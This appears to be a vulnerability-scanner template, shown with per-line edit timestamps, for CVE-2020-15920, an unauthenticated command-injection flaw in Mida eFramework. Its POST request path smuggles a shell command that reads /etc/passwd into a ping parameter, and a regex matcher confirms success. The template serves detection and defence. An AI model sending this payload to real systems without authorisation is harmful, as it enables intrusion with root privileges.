2021-01-02 04:56:15 +00:00
id : CVE-2020-15920
2020-09-01 18:38:31 +00:00
info :
2022-05-16 19:21:06 +00:00
name : Mida eFramework <= 2.9.0 - Remote Command Execution
2020-09-01 18:38:31 +00:00
author : dwisiswant0
severity : critical
2022-05-16 19:21:06 +00:00
description : Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
2022-04-22 10:38:41 +00:00
reference :
- https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
2022-05-16 19:21:06 +00:00
-
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-15920
cwe-id : CWE-78
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,mida,rce
2020-09-01 18:38:31 +00:00
requests :
- method : POST
path :
2020-09-16 17:02:49 +00:00
- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
2020-09-01 18:38:31 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-09-01 18:38:31 +00:00
part : body
2022-05-16 19:21:06 +00:00
# Enhanced by mp on 2022/05/16